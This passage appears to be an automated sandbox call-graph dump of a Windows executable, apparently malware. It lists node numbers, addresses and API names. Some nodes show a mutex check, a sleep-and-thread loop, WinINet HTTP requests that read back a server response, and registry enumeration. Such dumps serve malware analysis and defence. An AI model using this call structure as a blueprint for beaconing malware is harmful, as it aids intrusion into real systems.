aaeda9 36912->36915 36914 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36914->36915 36915->36914 36916 aaf699 Concurrency::details::SchedulerProxy::Cleanup 36915->36916 36917 aaf6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 36915->36917 36918 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36917->36918 36919 aaf727 36918->36919 36920 aa5c10 4 API calls 36919->36920 36921 aaf72e 36920->36921 36922 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36921->36922 36923 aaf741 36922->36923 36924 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36923->36924 36925 aaf756 36924->36925 36926 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36925->36926 36927 aaf76b 36926->36927 36928 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36927->36928 36929 aaf77d 36928->36929 37033 aae530 12 API calls 3 library calls 36929->37033 36931 aaf786 36932 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36931->36932 36933 aaf7aa 36932->36933 36934 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36933->36934 36935 aaf7ba 36934->36935 36936 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36935->36936 36937 aaf7d7 36936->36937 36938 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36937->36938 36940 aaf7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 36938->36940 36939 aaf982 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup 36940->36939 36941 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36940->36941 36942 aafa04 36941->36942 36943 aa5c10 4 API calls 36942->36943 36944 aafa0b 36943->36944 36945 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36944->36945 36946 aafa1e 36945->36946 36947 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36946->36947 36948 aafa33 36947->36948 36949 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36948->36949 36950 aafa48 36949->36950 36951 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36950->36951 36952 aafa5a 36951->36952 37034 aae530 12 API calls 3 library calls 36952->37034 36954 aafb35 Concurrency::details::SchedulerProxy::Cleanup 36955 aafa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 36955->36954 36956 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36955->36956 36957 aafba5 36956->36957 37035 aa9580 4 API calls 3 library calls 36957->37035 36959 aafbb4 37036 aa9230 4 API calls 3 library calls 36959->37036 36961 aafbc3 37037 ab8320 36961->37037 36963 aafbdb 36963->36963 36964 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36963->36964 36965 aafc8c 36964->36965 36966 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36965->36966 36967 aafca7 36966->36967 36968 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36967->36968 36969 aafcb9 36968->36969 36970 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36969->36970 36971 ab05d4 36970->36971 36972 aa5c10 4 API calls 36971->36972 36973 ab05db 36972->36973 36974 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36973->36974 36975 ab05f1 36974->36975 36976 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36975->36976 36977 ab0609 36976->36977 36978 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36977->36978 36979 ab0621 36978->36979 36980 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36979->36980 36981 ab0633 36980->36981 37041 aae530 12 API calls 3 library calls 36981->37041 36983 ab0880 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup 36984 ab063c Concurrency::details::_CancellationTokenState::_RegisterCallback 36984->36983 36985 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36984->36985 36986 ab0987 36985->36986 36987 aa5c10 4 API calls 36986->36987 36988 ab098e 36987->36988 36989 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36988->36989 36990 ab09a4 36989->36990 36991 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36990->36991 36992 ab09bc 36991->36992 36993 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36992->36993 36994 ab09d4 36993->36994 36995 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36994->36995 36996 ab12e0 36995->36996 37042 aae530 12 API calls 3 library calls 36996->37042 36998 ab12e9 37000 ab7a26 36999->37000 37001 ab7a2d 37000->37001 37002 ab7a62 37000->37002 37003 ab7a81 37000->37003 37001->36906 37004 ab7ab9 37002->37004 37005 ab7a69 37002->37005 37008 abd3e2 Concurrency::details::_RegisterConcRTEventTracing RtlAllocateHeap 37003->37008 37009 ab7a6f 6 library calls 37003->37009 37043 aa2480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 37004->37043 37007 abd3e2 Concurrency::details::_RegisterConcRTEventTracing RtlAllocateHeap 37005->37007 37007->37009 37008->37009 37009->36906 37044 aa5940 37010->37044 37014 aa5c6a 37063 aa4b30 37014->37063 37016 aa5c7b __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37016->36908 37077 ab7760 37017->37077 37019 ab8439 37021 ab8454 __InternalCxxFrameHandler 37019->37021 37089 ab8f40 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::_RegisterConcRTEventTracing 37019->37089 37024 ab84a8 __InternalCxxFrameHandler 37021->37024 37090 ab8f40 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::_RegisterConcRTEventTracing 37021->37090 37023 ab84ee 37023->36910 37024->36910 37026 ab8248 37025->37026 37027 ab8292 37025->37027 37026->37027 37028 ab8251 37026->37028 37030 ab82a1 __InternalCxxFrameHandler 37027->37030 37098 ab8f40 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::_RegisterConcRTEventTracing 37027->37098 37093 ab9280 37028->37093 37030->36912 37032 ab825a 37032->36912 37033->36931 37034->36955 37035->36959 37036->36961 37038 ab8339 37037->37038 37039 ab834d __InternalCxxFrameHandler 37038->37039 37100 ab8f40 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::_RegisterConcRTEventTracing 37038->37100 37039->36963 37041->36984 37042->36998 37043->37009 37070 ab7f80 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent Concurrency::details::_RegisterConcRTEventTracing 37044->37070 37046 aa596b 37047 aa59e0 37046->37047 37071 ab7f80 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent Concurrency::details::_RegisterConcRTEventTracing 37047->37071 37049 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37061 aa5a45 37049->37061 37050 aa5c09 37073 ab8200 RtlAllocateHeap 37050->37073 37051 aa5bdd __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 37051->37014 37053 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37053->37061 37061->37049 37061->37050 37061->37051 37061->37053 37072 aa5730 RtlAllocateHeap __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37061->37072 37064 aa4dc2 37063->37064 37068 aa4b92 37063->37068 37064->37016 37066 aa4ce5 37066->37064 37076 ab8ca0 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::_RegisterConcRTEventTracing 37066->37076 37068->37066 37074 ad6da6 GetPEB GetPEB RtlAllocateHeap __fassign 37068->37074 37075 ab8ca0 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::_RegisterConcRTEventTracing 37068->37075 37070->37046 37071->37061 37072->37061 37074->37068 37075->37068 37076->37066 37080 ab777b 37077->37080 37088 ab7864 Concurrency::details::SchedulerProxy::Cleanup std::_Rethrow_future_exception 37077->37088 37079 ab78f6 37092 aa2480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 37079->37092 37082 ab77ea 37080->37082 37083 ab7811 37080->37083 37087 ab77fb Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37080->37087 37080->37088 37082->37079 37086 abd3e2 Concurrency::details::_RegisterConcRTEventTracing RtlAllocateHeap 37082->37086 37085 abd3e2 Concurrency::details::_RegisterConcRTEventTracing RtlAllocateHeap 37083->37085 37083->37087 37084 ab78fb 37085->37087 37086->37087 37087->37088 37091 ab9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37087->37091 37088->37019 37089->37021 37090->37023 37092->37084 37094 ab9294 37093->37094 37097 ab92a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37094->37097 37099 ab94e0 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::_RegisterConcRTEventTracing 37094->37099 37096 ab932b 37096->37032 37097->37032 37098->37030 37099->37096 37100->37039 37101 aae62d 37102 aae63b Concurrency::details::SchedulerProxy::Cleanup 37101->37102 37103 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37102->37103 37129 aae83e Concurrency::details::_CancellationTokenState::_RegisterCallback 37102->37129 37106 aae7cb 37103->37106 37104 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37105 aaeb19 37104->37105 37107 aa5c10 4 API calls 37105->37107 37108 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37106->37108 37109 aaeb21 37107->37109 37110 aae7e0 37108->37110 37111 ab83c0 RtlAllocateHeap 37109->37111 37112 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37110->37112 37113 aaeb36 37111->37113 37114 aae7f2 37112->37114 37116 ab8220 RtlAllocateHeap 37113->37116 37224 aabe30 37114->37224 37118 aaeb45 GetFileAttributesA 37116->37118 37117 aae7fe 37119 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37117->37119 37125 aaeb62 37118->37125 37121 aae813 37119->37121 37122 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37121->37122 37123 aae82b 37122->37123 37124 aa5c10 4 API calls 37123->37124 37126 aae832 37124->37126 37128 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37125->37128 37248 aa8580 37126->37248 37130 aaed60 37128->37130 37129->37104 37137 aaea8f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup 37129->37137 37131 aa5c10 4 API calls 37130->37131 37132 aaed68 37131->37132 37133 ab83c0 RtlAllocateHeap 37132->37133 37134 aaed7d 37133->37134 37135 ab8220 RtlAllocateHeap 37134->37135 37136 aaed8c GetFileAttributesA 37135->37136 37140 aaeda9 37136->37140 37139 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37139->37140 37140->37139 37141 aaf699 Concurrency::details::SchedulerProxy::Cleanup 37140->37141 37142 aaf6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 37140->37142 37143 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37142->37143 37144 aaf727 37143->37144 37145 aa5c10 4 API calls 37144->37145 37146 aaf72e 37145->37146 37147 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37146->37147 37148 aaf741 37147->37148 37149 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37148->37149 37150 aaf756 37149->37150 37151 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37150->37151 37152 aaf76b 37151->37152 37153 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37152->37153 37154 aaf77d 37153->37154 37254 aae530 12 API calls 3 library calls 37154->37254 37156 aaf786 37157 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37156->37157 37158 aaf7aa 37157->37158 37159 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37158->37159 37160 aaf7ba 37159->37160 37161 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37160->37161 37162 aaf7d7 37161->37162 37163 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37162->37163 37165 aaf7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 37163->37165 37164 aaf982 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup 37165->37164 37166 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37165->37166 37167 aafa04 37166->37167 37168 aa5c10 4 API calls 37167->37168 37169 aafa0b 37168->37169 37170 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37169->37170 37171 aafa1e 37170->37171 37172 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37171->37172 37173 aafa33 37172->37173 37174 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37173->37174 37175 aafa48 37174->37175 37176 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37175->37176 37177 aafa5a 37176->37177 37255 aae530 12 API calls 3 library calls 37177->37255 37179 aafb35 Concurrency::details::SchedulerProxy::Cleanup 37180 aafa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 37180->37179 37181 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37180->37181 37182 aafba5 37181->37182 37256 aa9580 4 API calls 3 library calls 37182->37256 37184 aafbb4 37257 aa9230 4 API calls 3 library calls 37184->37257 37186 aafbc3 37187 ab8320 RtlAllocateHeap 37186->37187 37188 aafbdb 37187->37188 37188->37188 37189 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37188->37189 37190 aafc8c 37189->37190 37191 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37190->37191 37192 aafca7 37191->37192 37193 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37192->37193 37194 aafcb9 37193->37194 37195 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37194->37195 37196 ab05d4 37195->37196 37197 aa5c10 4 API calls 37196->37197 37198 ab05db 37197->37198 37199 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37198->37199 37200 ab05f1 37199->37200 37201 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37200->37201 37202 ab0609 37201->37202 37203 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37202->37203 37204 ab0621 37203->37204 37205 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37204->37205 37206 ab0633 37205->37206 37258 aae530 12 API calls 3 library calls 37206->37258 37208 ab0880 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup 37209 ab063c Concurrency::details::_CancellationTokenState::_RegisterCallback 37209->37208 37210 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37209->37210 37211 ab0987 37210->37211 37212 aa5c10 4 API calls 37211->37212 37213 ab098e 37212->37213 37214 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37213->37214 37215 ab09a4 37214->37215 37216 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37215->37216 37217 ab09bc 37216->37217 37218 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37217->37218 37219 ab09d4 37218->37219 37220 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37219->37220 37221 ab12e0 37220->37221 37259 aae530 12 API calls 3 library calls 37221->37259 37223 ab12e9 37225 aabe82 37224->37225 37226 aac281 37224->37226 37225->37226 37228 aabe96 Sleep InternetOpenW InternetConnectA 37225->37228 37227 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37226->37227 37234 aac22e __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37227->37234 37229 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37228->37229 37230 aabf18 37229->37230 37231 aa5c10 4 API calls 37230->37231 37232 aabf23 HttpOpenRequestA 37231->37232 37235 aabf4c Concurrency::details::SchedulerProxy::Cleanup 37232->37235 37234->37117 37236 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37235->37236 37237 aabfb4 37236->37237 37238 aa5c10 4 API calls 37237->37238 37239 aabfbf 37238->37239 37240 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37239->37240 37241 aabfd8 37240->37241 37242 aa5c10 4 API calls 37241->37242 37243 aabfe3 HttpSendRequestA 37242->37243 37246 aac006 Concurrency::details::SchedulerProxy::Cleanup 37243->37246 37245 aac08e InternetReadFile 37247 aac0b5 __InternalCxxFrameHandler 37245->37247 37246->37245 37252 aa86a0 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37248->37252 37253 aa85d5 Concurrency::details::SchedulerProxy::Cleanup 37248->37253 37249 aa8767 37260 ab8200 RtlAllocateHeap 37249->37260 37250 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37250->37253 37252->37129 37253->37249 37253->37250 37253->37252 37254->37156 37255->37180 37256->37184 37257->37186 37258->37209 37259->37223 37297 abd762 37298 abd76e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall CallCatchBlock 37297->37298 37299 abd8ce ___scrt_fastfail 37298->37299 37304 abd7be 37298->37304 37306 abd83f 37298->37306 37332 ad6603 2 API calls 4 library calls 37298->37332 37333 ad6629 GetPEB GetPEB __purecall 37299->37333 37301 abd8db 37334 ad65ed GetPEB GetPEB __purecall 37301->37334 37303 abd8e3 ___security_init_cookie 37305 abd8e9 __scrt_common_main_seh 37303->37305 37316 ad95bc 37306->37316 37309 abd845 37320 ab6d30 37309->37320 37317 ad95ca 37316->37317 37318 ad95c5 37316->37318 37317->37309 37335 ad9320 37318->37335 37359 aaa960 Sleep CreateMutexA 37320->37359 37324 ab6d45 37325 aad6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37324->37325 37326 ab6d4a 37325->37326 37327 ab4fc0 6 API calls 37326->37327 37328 ab6d4f 37327->37328 37329 aa6020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37328->37329 37330 ab6d54 37329->37330 37331 aa6020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37330->37331 37331->37330 37332->37306 37333->37301 37334->37303 37336 ad9329 37335->37336 37338 ad9336 37335->37338 37336->37338 37339 ad934c 37336->37339 37338->37317 37340 ad9358 37339->37340 37341 ad9355 37339->37341 37346 ade669 37340->37346 37341->37338 37345 ad9364 __freea 37345->37338 37347 ade672 37346->37347 37351 ad935f 37346->37351 37356 ada72e GetPEB GetPEB __dosmaperr __freea __purecall 37347->37356 37349 ade695 37357 ade4b0 3 API calls 4 library calls 37349->37357 37352 adea0a 37351->37352 37353 adea18 __cftof 37352->37353 37355 adea4a __cftof __freea 37353->37355 37358 adb04b RtlAllocateHeap __dosmaperr Concurrency::details::_RegisterConcRTEventTracing 37353->37358 37355->37345 37356->37349 37357->37351 37358->37355 37361 aaa98e 37359->37361 37360 aaa9a7 37364 aace40 37360->37364 37361->37360 37369 ad6629 GetPEB GetPEB __purecall 37361->37369 37363 aaa9b0 37365 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37364->37365 37366 aace92 37365->37366 37367 aa5c10 4 API calls 37366->37367 37368 aace9d 37367->37368 37369->37363 37370 ab6d00 CreateThread 37371 ab6d20 Sleep 37370->37371 37372 ab6c70 37370->37372 37371->37371 37375 ab6ca0 37372->37375 37373 ab7a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37373->37375 37374 aa5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37374->37375 37375->37373 37375->37374 37378 ab47b0 37375->37378 37377 ab6cec Sleep 37377->37375 37379 ab47eb 37378->37379 37460 ab4e70 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37378->37460 37380 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37379->37380 37379->37460 37381 ab480c 37380->37381 37382 aa5c10 4 API calls 37381->37382 37383 ab4813 37382->37383 37384 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37383->37384 37385 ab4825 37384->37385 37386 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37385->37386 37387 ab4837 37386->37387 37388 aabe30 10 API calls 37387->37388 37389 ab4843 37388->37389 37390 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37389->37390 37391 ab4858 37390->37391 37392 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37391->37392 37393 ab4870 37392->37393 37394 aa5c10 4 API calls 37393->37394 37395 ab4877 37394->37395 37396 aa8580 RtlAllocateHeap 37395->37396 37397 ab4883 37396->37397 37398 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37397->37398 37457 ab4afd 37397->37457 37400 ab489f 37398->37400 37399 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37401 ab4b2f 37399->37401 37402 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37400->37402 37403 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37401->37403 37404 ab48b7 37402->37404 37405 ab4b44 37403->37405 37406 aa5c10 4 API calls 37404->37406 37407 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37405->37407 37408 ab48be 37406->37408 37409 ab4b56 37407->37409 37410 aa8580 RtlAllocateHeap 37408->37410 37411 aabe30 10 API calls 37409->37411 37412 ab48ca 37410->37412 37413 ab4b62 37411->37413 37415 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37412->37415 37412->37457 37414 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37413->37414 37416 ab4b77 37414->37416 37418 ab48e7 37415->37418 37417 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37416->37417 37420 ab4b8f 37417->37420 37419 aa5c10 4 API calls 37418->37419 37424 ab48ef 37419->37424 37421 aa5c10 4 API calls 37420->37421 37422 ab4b96 37421->37422 37423 aa8580 RtlAllocateHeap 37422->37423 37425 ab4ba2 37423->37425 37426 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37424->37426 37427 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37425->37427 37425->37460 37431 ab4959 Concurrency::details::SchedulerProxy::Cleanup 37426->37431 37428 ab4bbe 37427->37428 37429 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37428->37429 37430 ab4bd6 37429->37430 37433 aa5c10 4 API calls 37430->37433 37432 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37431->37432 37434 ab49e6 37432->37434 37435 ab4bdd 37433->37435 37436 aa5c10 4 API calls 37434->37436 37437 aa8580 RtlAllocateHeap 37435->37437 37441 ab49ee 37436->37441 37438 ab4be9 37437->37438 37439 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37438->37439 37438->37460 37440 ab4c06 37439->37440 37442 aa5c10 4 API calls 37440->37442 37443 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37441->37443 37444 ab4c0e 37442->37444 37445 ab4a49 Concurrency::details::SchedulerProxy::Cleanup 37443->37445 37446 ab4c5a 37444->37446 37447 ab4f97 37444->37447 37445->37457 37496 aa98f0 37445->37496 37450 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37446->37450 37505 ab8200 RtlAllocateHeap 37447->37505 37455 ab4c78 Concurrency::details::SchedulerProxy::Cleanup 37450->37455 37451 ab4f9c 37506 abc1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::_TaskCollection::~_TaskCollection 37451->37506 37453 ab4ad5 __dosmaperr 37453->37457 37501 ad8ab6 37453->37501 37456 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37455->37456 37455->37460 37458 ab4d05 37456->37458 37457->37399 37457->37451 37459 aa5c10 4 API calls 37458->37459 37461 ab4d0d 37459->37461 37460->37377 37462 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37461->37462 37464 ab4d68 Concurrency::details::SchedulerProxy::Cleanup 37462->37464 37463 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37465 ab4df7 37463->37465 37464->37460 37464->37463 37466 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37465->37466 37467 ab4e0c 37466->37467 37468 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37467->37468 37469 ab4e27 37468->37469 37470 aa5c10 4 API calls 37469->37470 37471 ab4e2e 37470->37471 37472 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37471->37472 37473 ab4e67 37472->37473 37475 ab4390 37473->37475 37476 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37475->37476 37477 ab43d2 37476->37477 37478 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37477->37478 37479 ab43e4 37478->37479 37480 aa8580 RtlAllocateHeap 37479->37480 37481 ab43ed 37480->37481 37482 ab4646 37481->37482 37493 ab43f8 Concurrency::details::SchedulerProxy::Cleanup 37481->37493 37483 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37482->37483 37484 ab4657 37483->37484 37485 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37484->37485 37487 ab466c 37485->37487 37486 ab80c0 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37486->37493 37488 ab7a00 